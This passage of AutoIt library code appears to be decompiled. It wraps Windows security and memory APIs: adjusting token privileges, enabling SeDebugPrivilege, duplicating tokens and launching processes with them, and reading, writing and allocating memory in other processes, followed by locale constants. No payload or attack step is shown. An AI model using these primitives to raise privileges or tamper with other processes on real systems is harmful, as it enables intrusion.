"S-1-16-0" GLOBAL CONST $SID_LOW_MANDATORY_LEVEL = "S-1-16-4096" GLOBAL CONST $SID_MEDIUM_MANDATORY_LEVEL = "S-1-16-8192" GLOBAL CONST $SID_MEDIUM_PLUS_MANDATORY_LEVEL = "S-1-16-8448" GLOBAL CONST $SID_HIGH_MANDATORY_LEVEL = "S-1-16-12288" GLOBAL CONST $SID_SYSTEM_MANDATORY_LEVEL = "S-1-16-16384" GLOBAL CONST $SID_PROTECTED_PROCESS_MANDATORY_LEVEL = "S-1-16-20480" GLOBAL CONST $SID_SECURE_PROCESS_MANDATORY_LEVEL = "S-1-16-28672" GLOBAL CONST $SID_ALL_SERVICES = "S-1-5-80-0" FUNC _SECURITY__ADJUSTTOKENPRIVILEGES ($HTOKEN , $BDISABLEALL , $TNEWSTATE , $IBUFFERLEN , $TPREVSTATE = 0 , $PREQUIRED = 0 ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "AdjustTokenPrivileges" , "handle" , $HTOKEN , "bool" , $BDISABLEALL , "struct*" , $TNEWSTATE , "dword" , $IBUFFERLEN , "struct*" , $TPREVSTATE , "struct*" , $PREQUIRED ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN NOT ($ACALL [0 ] = 0 ) ENDFUNC FUNC _SECURITY__CREATEPROCESSWITHTOKEN ($HTOKEN , $ILOGONFLAGS , $SCOMMANDLINE , $ICREATIONFLAGS , $SCURDIR , $TSTARTUPINFO , $TPROCESS_INFORMATION ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "CreateProcessWithTokenW" , "handle" , $HTOKEN , "dword" , $ILOGONFLAGS , "ptr" , 0 , "wstr" , $SCOMMANDLINE , "dword" , $ICREATIONFLAGS , "struct*" , 0 , "wstr" , $SCURDIR , "struct*" , $TSTARTUPINFO , "struct*" , $TPROCESS_INFORMATION ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN TRUE ENDFUNC FUNC _SECURITY__DUPLICATETOKENEX ($HEXISTINGTOKEN , $IDESIREDACCESS , $IIMPERSONATIONLEVEL , $ITOKENTYPE ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "DuplicateTokenEx" , "handle" , $HEXISTINGTOKEN , "dword" , $IDESIREDACCESS , "struct*" , 0 , "int" , $IIMPERSONATIONLEVEL , "int" , $ITOKENTYPE , "handle*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ACALL [6 ] ENDFUNC FUNC _SECURITY__GETACCOUNTSID ($SACCOUNT , $SSYSTEM = "" ) LOCAL $AACCT = _SECURITY__LOOKUPACCOUNTNAME ($SACCOUNT , $SSYSTEM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF ISARRAY ($AACCT ) THEN RETURN _SECURITY__STRINGSIDTOSID ($AACCT [0 ] ) RETURN "" ENDFUNC FUNC _SECURITY__GETLENGTHSID ($PSID ) IF NOT _SECURITY__ISVALIDSID ($PSID ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "dword" , "GetLengthSid" , "struct*" , $PSID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ACALL [0 ] ENDFUNC FUNC _SECURITY__GETTOKENINFORMATION ($HTOKEN , $ICLASS ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "GetTokenInformation" , "handle" , $HTOKEN , "int" , $ICLASS , "struct*" , 0 , "dword" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ACALL [5 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ILEN = $ACALL [5 ] LOCAL $TBUFFER = DLLSTRUCTCREATE ("byte[" & $ILEN & "]" ) $ACALL = DLLCALL ("advapi32.dll" , "bool" , "GetTokenInformation" , "handle" , $HTOKEN , "int" , $ICLASS , "struct*" , $TBUFFER , "dword" , DLLSTRUCTGETSIZE ($TBUFFER ) , "dword*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TBUFFER ENDFUNC FUNC _SECURITY__IMPERSONATESELF ($ILEVEL = $SECURITYIMPERSONATION ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "ImpersonateSelf" , "int" , $ILEVEL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN NOT ($ACALL [0 ] = 0 ) ENDFUNC FUNC _SECURITY__ISVALIDSID ($PSID ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "IsValidSid" , "struct*" , $PSID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN NOT ($ACALL [0 ] = 0 ) ENDFUNC FUNC _SECURITY__LOOKUPACCOUNTNAME ($SACCOUNT , $SSYSTEM = "" ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte SID[256]" ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "LookupAccountNameW" , "wstr" , $SSYSTEM , "wstr" , $SACCOUNT , "struct*" , $TDATA , "dword*" , DLLSTRUCTGETSIZE ($TDATA ) , "wstr" , "" , "dword*" , DLLSTRUCTGETSIZE ($TDATA ) , "int*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $AACCT [3 ] $AACCT [0 ] = _SECURITY__SIDTOSTRINGSID (DLLSTRUCTGETPTR ($TDATA , "SID" ) ) $AACCT [1 ] = $ACALL [5 ] $AACCT [2 ] = $ACALL [7 ] RETURN $AACCT ENDFUNC FUNC _SECURITY__LOOKUPACCOUNTSID ($VSID , $SSYSTEM = "" ) LOCAL $PSID , $AACCT [3 ] IF ISSTRING ($VSID ) THEN $PSID = _SECURITY__STRINGSIDTOSID ($VSID ) ELSE $PSID = $VSID ENDIF IF NOT _SECURITY__ISVALIDSID ($PSID ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $STYPESYSTEM = "ptr" IF $SSYSTEM THEN $STYPESYSTEM = "wstr" LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "LookupAccountSidW" , $STYPESYSTEM , $SSYSTEM , "struct*" , $PSID , "wstr" , "" , "dword*" , 65536 , "wstr" , "" , "dword*" , 65536 , "int*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $AACCT [3 ] $AACCT [0 ] = $ACALL [3 ] $AACCT [1 ] = $ACALL [5 ] $AACCT [2 ] = $ACALL [7 ] RETURN $AACCT ENDFUNC FUNC _SECURITY__LOOKUPPRIVILEGEVALUE ($SSYSTEM , $SNAME ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "LookupPrivilegeValueW" , "wstr" , $SSYSTEM , "wstr" , $SNAME , "int64*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ACALL [3 ] ENDFUNC FUNC _SECURITY__OPENPROCESSTOKEN ($HPROCESS , $IACCESS ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "OpenProcessToken" , "handle" , $HPROCESS , "dword" , $IACCESS , "handle*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ACALL [3 ] ENDFUNC FUNC _SECURITY__OPENTHREADTOKEN ($IACCESS , $HTHREAD = 0 , $BOPENASSELF = FALSE ) IF $HTHREAD = 0 THEN LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GetCurrentThread" ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) $HTHREAD = $ARESULT [0 ] ENDIF LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "OpenThreadToken" , "handle" , $HTHREAD , "dword" , $IACCESS , "bool" , $BOPENASSELF , "handle*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ACALL [4 ] ENDFUNC FUNC _SECURITY__OPENTHREADTOKENEX ($IACCESS , $HTHREAD = 0 , $BOPENASSELF = FALSE ) LOCAL $HTOKEN = _SECURITY__OPENTHREADTOKEN ($IACCESS , $HTHREAD , $BOPENASSELF ) IF $HTOKEN = 0 THEN LOCAL CONST $ERROR_NO_TOKEN = 1008 IF _WINAPI_GETLASTERROR () <> $ERROR_NO_TOKEN THEN RETURN SETERROR (20 , _WINAPI_GETLASTERROR () , 0 ) IF NOT _SECURITY__IMPERSONATESELF () THEN RETURN SETERROR (@ERROR + 10 , _WINAPI_GETLASTERROR () , 0 ) $HTOKEN = _SECURITY__OPENTHREADTOKEN ($IACCESS , $HTHREAD , $BOPENASSELF ) IF $HTOKEN = 0 THEN RETURN SETERROR (@ERROR , _WINAPI_GETLASTERROR () , 0 ) ENDIF RETURN $HTOKEN ENDFUNC FUNC _SECURITY__SETPRIVILEGE ($HTOKEN , $SPRIVILEGE , $BENABLE ) LOCAL $ILUID = _SECURITY__LOOKUPPRIVILEGEVALUE ("" , $SPRIVILEGE ) IF $ILUID = 0 THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , FALSE ) LOCAL CONST $TAGTOKEN_PRIVILEGES = "dword Count;align 4;int64 LUID;dword Attributes" LOCAL $TCURRSTATE = DLLSTRUCTCREATE ($TAGTOKEN_PRIVILEGES ) LOCAL $ICURRSTATE = DLLSTRUCTGETSIZE ($TCURRSTATE ) LOCAL $TPREVSTATE = DLLSTRUCTCREATE ($TAGTOKEN_PRIVILEGES ) LOCAL $IPREVSTATE = DLLSTRUCTGETSIZE ($TPREVSTATE ) LOCAL $TREQUIRED = DLLSTRUCTCREATE ("int Data" ) DLLSTRUCTSETDATA ($TCURRSTATE , "Count" , 1 ) DLLSTRUCTSETDATA ($TCURRSTATE , "LUID" , $ILUID ) IF NOT _SECURITY__ADJUSTTOKENPRIVILEGES ($HTOKEN , FALSE , $TCURRSTATE , $ICURRSTATE , $TPREVSTATE , $TREQUIRED ) THEN RETURN SETERROR (2 , @ERROR , FALSE ) DLLSTRUCTSETDATA ($TPREVSTATE , "Count" , 1 ) DLLSTRUCTSETDATA ($TPREVSTATE , "LUID" , $ILUID ) LOCAL $IATTRIBUTES = DLLSTRUCTGETDATA ($TPREVSTATE , "Attributes" ) IF $BENABLE THEN $IATTRIBUTES = BITOR ($IATTRIBUTES , $SE_PRIVILEGE_ENABLED ) ELSE $IATTRIBUTES = BITAND ($IATTRIBUTES , BITNOT ($SE_PRIVILEGE_ENABLED ) ) ENDIF DLLSTRUCTSETDATA ($TPREVSTATE , "Attributes" , $IATTRIBUTES ) IF NOT _SECURITY__ADJUSTTOKENPRIVILEGES ($HTOKEN , FALSE , $TPREVSTATE , $IPREVSTATE , $TCURRSTATE , $TREQUIRED ) THEN RETURN SETERROR (3 , @ERROR , FALSE ) RETURN TRUE ENDFUNC FUNC _SECURITY__SETTOKENINFORMATION ($HTOKEN , $ITOKENINFORMATION , $VTOKENINFORMATION , $ITOKENINFORMATIONLENGTH ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "SetTokenInformation" , "handle" , $HTOKEN , "int" , $ITOKENINFORMATION , "struct*" , $VTOKENINFORMATION , "dword" , $ITOKENINFORMATIONLENGTH ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN TRUE ENDFUNC FUNC _SECURITY__SIDTOSTRINGSID ($PSID ) IF NOT _SECURITY__ISVALIDSID ($PSID ) THEN RETURN SETERROR (@ERROR + 10 , 0 , "" ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "ConvertSidToStringSidW" , "struct*" , $PSID , "ptr*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) LOCAL $PSTRINGSID = $ACALL [2 ] LOCAL $ALEN = DLLCALL ("kernel32.dll" , "int" , "lstrlenW" , "struct*" , $PSTRINGSID ) LOCAL $SSID = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar Text[" & $ALEN [0 ] + 1 & "]" , $PSTRINGSID ) , "Text" ) DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $PSTRINGSID ) RETURN $SSID ENDFUNC FUNC _SECURITY__SIDTYPESTR ($ITYPE ) SWITCH $ITYPE CASE $SIDTYPEUSER RETURN "User" CASE $SIDTYPEGROUP RETURN "Group" CASE $SIDTYPEDOMAIN RETURN "Domain" CASE $SIDTYPEALIAS RETURN "Alias" CASE $SIDTYPEWELLKNOWNGROUP RETURN "Well Known Group" CASE $SIDTYPEDELETEDACCOUNT RETURN "Deleted Account" CASE $SIDTYPEINVALID RETURN "Invalid" CASE $SIDTYPEUNKNOWN RETURN "Unknown Type" CASE $SIDTYPECOMPUTER RETURN "Computer" CASE $SIDTYPELABEL RETURN "A mandatory integrity label SID" CASE ELSE RETURN "Unknown SID Type" ENDSWITCH ENDFUNC FUNC _SECURITY__STRINGSIDTOSID ($SSID ) LOCAL $ACALL = DLLCALL ("advapi32.dll" , "bool" , "ConvertStringSidToSidW" , "wstr" , $SSID , "ptr*" , 0 ) IF @ERROR OR NOT $ACALL [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) LOCAL $PSID = $ACALL [2 ] LOCAL $TBUFFER = DLLSTRUCTCREATE ("byte Data[" & _SECURITY__GETLENGTHSID ($PSID ) & "]" , $PSID ) LOCAL $TSID = DLLSTRUCTCREATE ("byte Data[" & DLLSTRUCTGETSIZE ($TBUFFER ) & "]" ) DLLSTRUCTSETDATA ($TSID , "Data" , DLLSTRUCTGETDATA ($TBUFFER , "Data" ) ) DLLCALL ("kernel32.dll" , "handle" , "LocalFree" , "handle" , $PSID ) RETURN $TSID ENDFUNC GLOBAL CONST $TAGMEMMAP = "handle hProc;ulong_ptr Size;ptr Mem" FUNC _MEMFREE (BYREF $TMEMMAP ) LOCAL $PMEMORY = DLLSTRUCTGETDATA ($TMEMMAP , "Mem" ) LOCAL $HPROCESS = DLLSTRUCTGETDATA ($TMEMMAP , "hProc" ) LOCAL $BRESULT = _MEMVIRTUALFREEEX ($HPROCESS , $PMEMORY , 0 , $MEM_RELEASE ) DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HPROCESS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $BRESULT ENDFUNC FUNC _MEMGLOBALALLOC ($IBYTES , $IFLAGS = 0 ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "GlobalAlloc" , "uint" , $IFLAGS , "ulong_ptr" , $IBYTES ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMGLOBALFREE ($HMEMORY ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ptr" , "GlobalFree" , "handle" , $HMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMGLOBALLOCK ($HMEMORY ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ptr" , "GlobalLock" , "handle" , $HMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMGLOBALSIZE ($HMEMORY ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ulong_ptr" , "GlobalSize" , "handle" , $HMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMGLOBALUNLOCK ($HMEMORY ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "GlobalUnlock" , "handle" , $HMEMORY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMINIT ($HWND , $ISIZE , BYREF $TMEMMAP ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "dword" , "GetWindowThreadProcessId" , "hwnd" , $HWND , "dword*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $IPROCESSID = $ARESULT [2 ] IF $IPROCESSID = 0 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IACCESS = BITOR ($PROCESS_VM_OPERATION , $PROCESS_VM_READ , $PROCESS_VM_WRITE ) LOCAL $HPROCESS = __MEM_OPENPROCESS ($IACCESS , FALSE , $IPROCESSID , TRUE ) LOCAL $IALLOC = BITOR ($MEM_RESERVE , $MEM_COMMIT ) LOCAL $PMEMORY = _MEMVIRTUALALLOCEX ($HPROCESS , 0 , $ISIZE , $IALLOC , $PAGE_READWRITE ) IF $PMEMORY = 0 THEN RETURN SETERROR (2 , 0 , 0 ) $TMEMMAP = DLLSTRUCTCREATE ($TAGMEMMAP ) DLLSTRUCTSETDATA ($TMEMMAP , "hProc" , $HPROCESS ) DLLSTRUCTSETDATA ($TMEMMAP , "Size" , $ISIZE ) DLLSTRUCTSETDATA ($TMEMMAP , "Mem" , $PMEMORY ) RETURN $PMEMORY ENDFUNC FUNC _MEMMOVEMEMORY ($PSOURCE , $PDEST , $ILENGTH ) DLLCALL ("kernel32.dll" , "none" , "RtlMoveMemory" , "struct*" , $PDEST , "struct*" , $PSOURCE , "ulong_ptr" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED ) ENDFUNC FUNC _MEMREAD (BYREF $TMEMMAP , $PSRCE , $PDEST , $ISIZE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "ReadProcessMemory" , "handle" , DLLSTRUCTGETDATA ($TMEMMAP , "hProc" ) , "ptr" , $PSRCE , "struct*" , $PDEST , "ulong_ptr" , $ISIZE , "ulong_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMWRITE (BYREF $TMEMMAP , $PSRCE , $PDEST = 0 , $ISIZE = 0 , $SSRCE = "struct*" ) IF $PDEST = 0 THEN $PDEST = DLLSTRUCTGETDATA ($TMEMMAP , "Mem" ) IF $ISIZE = 0 THEN $ISIZE = DLLSTRUCTGETDATA ($TMEMMAP , "Size" ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "WriteProcessMemory" , "handle" , DLLSTRUCTGETDATA ($TMEMMAP , "hProc" ) , "ptr" , $PDEST , $SSRCE , $PSRCE , "ulong_ptr" , $ISIZE , "ulong_ptr*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMVIRTUALALLOC ($PADDRESS , $ISIZE , $IALLOCATION , $IPROTECT ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , $PADDRESS , "ulong_ptr" , $ISIZE , "dword" , $IALLOCATION , "dword" , $IPROTECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMVIRTUALALLOCEX ($HPROCESS , $PADDRESS , $ISIZE , $IALLOCATION , $IPROTECT ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ptr" , "VirtualAllocEx" , "handle" , $HPROCESS , "ptr" , $PADDRESS , "ulong_ptr" , $ISIZE , "dword" , $IALLOCATION , "dword" , $IPROTECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMVIRTUALFREE ($PADDRESS , $ISIZE , $IFREETYPE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "VirtualFree" , "ptr" , $PADDRESS , "ulong_ptr" , $ISIZE , "dword" , $IFREETYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _MEMVIRTUALFREEEX ($HPROCESS , $PADDRESS , $ISIZE , $IFREETYPE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "bool" , "VirtualFreeEx" , "handle" , $HPROCESS , "ptr" , $PADDRESS , "ulong_ptr" , $ISIZE , "dword" , $IFREETYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC __MEM_OPENPROCESS ($IACCESS , $BINHERIT , $IPID , $BDEBUGPRIV = FALSE ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , $IACCESS , "bool" , $BINHERIT , "dword" , $IPID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARESULT [0 ] THEN RETURN $ARESULT [0 ] IF NOT $BDEBUGPRIV THEN RETURN SETERROR (100 , 0 , 0 ) LOCAL $HTOKEN = _SECURITY__OPENTHREADTOKENEX (BITOR ($TOKEN_ADJUST_PRIVILEGES , $TOKEN_QUERY ) ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) _SECURITY__SETPRIVILEGE ($HTOKEN , "SeDebugPrivilege" , TRUE ) LOCAL $IERROR = @ERROR LOCAL $IEXTENDED = @EXTENDED LOCAL $IRET = 0 IF NOT @ERROR THEN $ARESULT = DLLCALL ("kernel32.dll" , "handle" , "OpenProcess" , "dword" , $IACCESS , "bool" , $BINHERIT , "dword" , $IPID ) $IERROR = @ERROR $IEXTENDED = @EXTENDED IF $ARESULT [0 ] THEN $IRET = $ARESULT [0 ] _SECURITY__SETPRIVILEGE ($HTOKEN , "SeDebugPrivilege" , FALSE ) IF @ERROR THEN $IERROR = @ERROR + 20 $IEXTENDED = @EXTENDED ENDIF ELSE $IERROR = @ERROR + 30 ENDIF DLLCALL ("kernel32.dll" , "bool" , "CloseHandle" , "handle" , $HTOKEN ) RETURN SETERROR ($IERROR , $IEXTENDED , $IRET ) ENDFUNC GLOBAL CONST $LINGUISTIC_IGNORECASE = 16 GLOBAL CONST $LINGUISTIC_IGNOREDIACRITIC = 32 GLOBAL CONST $NORM_IGNORECASE = 1 GLOBAL CONST $NORM_IGNOREKANATYPE = 65536 GLOBAL CONST $NORM_IGNORENONSPACE = 2 GLOBAL CONST $NORM_IGNORESYMBOLS = 4 GLOBAL CONST $NORM_IGNOREWIDTH = 131072 GLOBAL CONST $NORM_LINGUISTIC_CASING = 134217728 GLOBAL CONST $SORT_DIGITSASNUMBERS = 8 GLOBAL CONST $SORT_STRINGSORT = 4096 GLOBAL CONST $CSTR_LESS_THAN = 1 GLOBAL CONST $CSTR_EQUAL = 2 GLOBAL CONST $CSTR_GREATER_THAN = 3 GLOBAL CONST $MUI_LANGUAGE_ID = 4 GLOBAL CONST $MUI_LANGUAGE_NAME = 8 GLOBAL CONST $DATE_AUTOLAYOUT = 64 GLOBAL CONST $DATE_LONGDATE = 2 GLOBAL CONST $DATE_LTRREADING = 16 GLOBAL CONST $DATE_SHORTDATE = 1 GLOBAL CONST $DATE_RTLREADING = 32 GLOBAL CONST $DATE_USE_ALT_CALENDAR = 4 GLOBAL CONST $DATE_YEARMONTH = 8 GLOBAL CONST $GEO_NATION = 1 GLOBAL CONST $GEO_LATITUDE = 2 GLOBAL CONST $GEO_LONGITUDE = 3 GLOBAL CONST $GEO_ISO2 = 4 GLOBAL CONST $GEO_ISO3 = 5 GLOBAL CONST $GEO_RFC1766 = 6 GLOBAL CONST $GEO_LCID = 7 GLOBAL CONST $GEO_FRIENDLYNAME = 8 GLOBAL CONST $GEO_OFFICIALNAME = 9 GLOBAL CONST $GEO_TIMEZONES = 10 GLOBAL CONST $GEO_OFFICIALLANGUAGES = 11 GLOBAL CONST $GEO_ISO_UN_NUMBER = 12 GLOBAL CONST $GEO_PARENT = 13 GLOBAL CONST $LOCALE_ILANGUAGE = 1 GLOBAL CONST $LOCALE_SLANGUAGE = 2 GLOBAL CONST $LOCALE_SENGLANGUAGE = 4097 GLOBAL CONST $LOCALE_SABBREVLANGNAME = 3 GLOBAL CONST $LOCALE_SNATIVELANGNAME = 4 GLOBAL CONST $LOCALE_ICOUNTRY = 5 GLOBAL CONST $LOCALE_SCOUNTRY = 6 GLOBAL CONST $LOCALE_SENGCOUNTRY = 4098 GLOBAL CONST $LOCALE_SABBREVCTRYNAME = 7 GLOBAL CONST $LOCALE_SNATIVECTRYNAME = 8 GLOBAL CONST $LOCALE_IDEFAULTLANGUAGE = 9 GLOBAL CONST $LOCALE_IDEFAULTCOUNTRY = 10 GLOBAL CONST $LOCALE_IDEFAULTCODEPAGE = 11 GLOBAL CONST $LOCALE_IDEFAULTANSICODEPAGE = 4100 GLOBAL CONST $LOCALE_IDEFAULTMACCODEPAGE = 4113 GLOBAL CONST $LOCALE_SLIST = 12 GLOBAL CONST $LOCALE_IMEASURE = 13 GLOBAL CONST $LOCALE_SDECIMAL = 14 GLOBAL CONST $LOCALE_STHOUSAND = 15 GLOBAL CONST $LOCALE_SGROUPING = 16 GLOBAL CONST $LOCALE_IDIGITS = 17 GLOBAL CONST $LOCALE_ILZERO = 18 GLOBAL CONST $LOCALE_INEGNUMBER = 4112 GLOBAL CONST $LOCALE_SNATIVEDIGITS = 19 GLOBAL CONST $LOCALE_SCURRENCY = 20 GLOBAL CONST $LOCALE_SINTLSYMBOL = 21 GLOBAL CONST $LOCALE_SMONDECIMALSEP = 22 GLOBAL CONST $LOCALE_SMONTHOUSANDSEP = 23 GLOBAL CONST $LOCALE_SMONGROUPING = 24 GLOBAL CONST $LOCALE_ICURRDIGITS = 25 GLOBAL CONST $LOCALE_IINTLCURRDIGITS = 26 GLOBAL CONST $LOCALE_ICURRENCY = 27 GLOBAL CONST $LOCALE_INEGCURR = 28 GLOBAL CONST $LOCALE_SDATE = 29 GLOBAL CONST $LOCALE_STIME = 30 GLOBAL CONST $LOCALE_SSHORTDATE = 31 GLOBAL CONST $LOCALE_SLONGDATE = 32 GLOBAL CONST $LOCALE_STIMEFORMAT = 4099 GLOBAL CONST $LOCALE_IDATE = 33 GLOBAL CONST $LOCALE_ILDATE = 34 GLOBAL CONST $LOCALE_ITIME = 35 GLOBAL CONST $LOCALE_ITIMEMARKPOSN = 4101 GLOBAL CONST $LOCALE_ICENTURY = 36 GLOBAL CONST $LOCALE_ITLZERO = 37 GLOBAL CONST $LOCALE_IDAYLZERO = 38 GLOBAL CONST $LOCALE_IMONLZERO = 39 GLOBAL CONST $LOCALE_S1159 = 40 GLOBAL CONST $LOCALE_S2359 = 41 GLOBAL CONST $LOCALE_ICALENDARTYPE = 4105 GLOBAL CONST $LOCALE_IOPTIONALCALENDAR = 4107 GLOBAL CONST $LOCALE_IFIRSTDAYOFWEEK = 4108 GLOBAL CONST $LOCALE_IFIRSTWEEKOFYEAR = 4109 GLOBAL CONST $LOCALE_SDAYNAME1 = 42 GLOBAL CONST $LOCALE_SDAYNAME2 = 43 GLOBAL CONST $LOCALE_SDAYNAME3 = 44 GLOBAL CONST $LOCALE_SDAYNAME4 = 45 GLOBAL CONST $LOCALE_SDAYNAME5 = 46 GLOBAL CONST $LOCALE_SDAYNAME6 = 47 GLOBAL CONST $LOCALE_SDAYNAME7 = 48 GLOBAL CONST $LOCALE_SABBREVDAYNAME1 = 49 GLOBAL CONST $LOCALE_SABBREVDAYNAME2 = 50 GLOBAL CONST $LOCALE_SABBREVDAYNAME3 = 51 GLOBAL CONST $LOCALE_SABBREVDAYNAME4 = 52 GLOBAL CONST $LOCALE_SABBREVDAYNAME5 = 53 GLOBAL CONST $LOCALE_SABBREVDAYNAME6 = 54 GLOBAL CONST $LOCALE_SABBREVDAYNAME7 = 55 GLOBAL CONST $LOCALE_SMONTHNAME1 = 56 GLOBAL CONST $LOCALE_SMONTHNAME2 = 57 GLOBAL CONST $LOCALE_SMONTHNAME3 = 58 GLOBAL CONST $LOCALE_SMONTHNAME4 = 59 GLOBAL CONST $LOCALE_SMONTHNAME5 = 60 GLOBAL CONST $LOCALE_SMONTHNAME6 = 61 GLOBAL CONST $LOCALE_SMONTHNAME7 = 62 GLOBAL CONST $LOCALE_SMONTHNAME8 = 63 GLOBAL CONST $LOCALE_SMONTHNAME9 = 64 GLOBAL CONST $LOCALE_SMONTHNAME10 = 65 GLOBAL CONST $LOCALE_SMONTHNAME11 = 66 GLOBAL CONST $LOCALE_SMONTHNAME12 = 67 GLOBAL CONST $LOCALE_SMONTHNAME13 = 4110 GLOBAL CONST $LOCALE_SABBREVMONTHNAME1 = 68 GLOBAL CONST $LOCALE_SABBREVMONTHNAME2 = 69 GLOBAL CONST $LOCALE_SABBREVMONTHNAME3 = 70 GLOBAL CONST $LOCALE_SABBREVMONTHNAME4 = 71 GLOBAL CONST $LOCALE_SABBREVMONTHNAME5 = 72 GLOBAL CONST $LOCALE_SABBREVMONTHNAME6 = 73 GLOBAL CONST $LOCALE_SABBREVMONTHNAME7 = 74 GLOBAL CONST $LOCALE_SABBREVMONTHNAME8 = 75 GLOBAL CONST $LOCALE_SABBREVMONTHNAME9 = 76 GLOBAL CONST $LOCALE_SABBREVMONTHNAME10 = 77 GLOBAL CONST $LOCALE_SABBREVMONTHNAME11 = 78 GLOBAL CONST 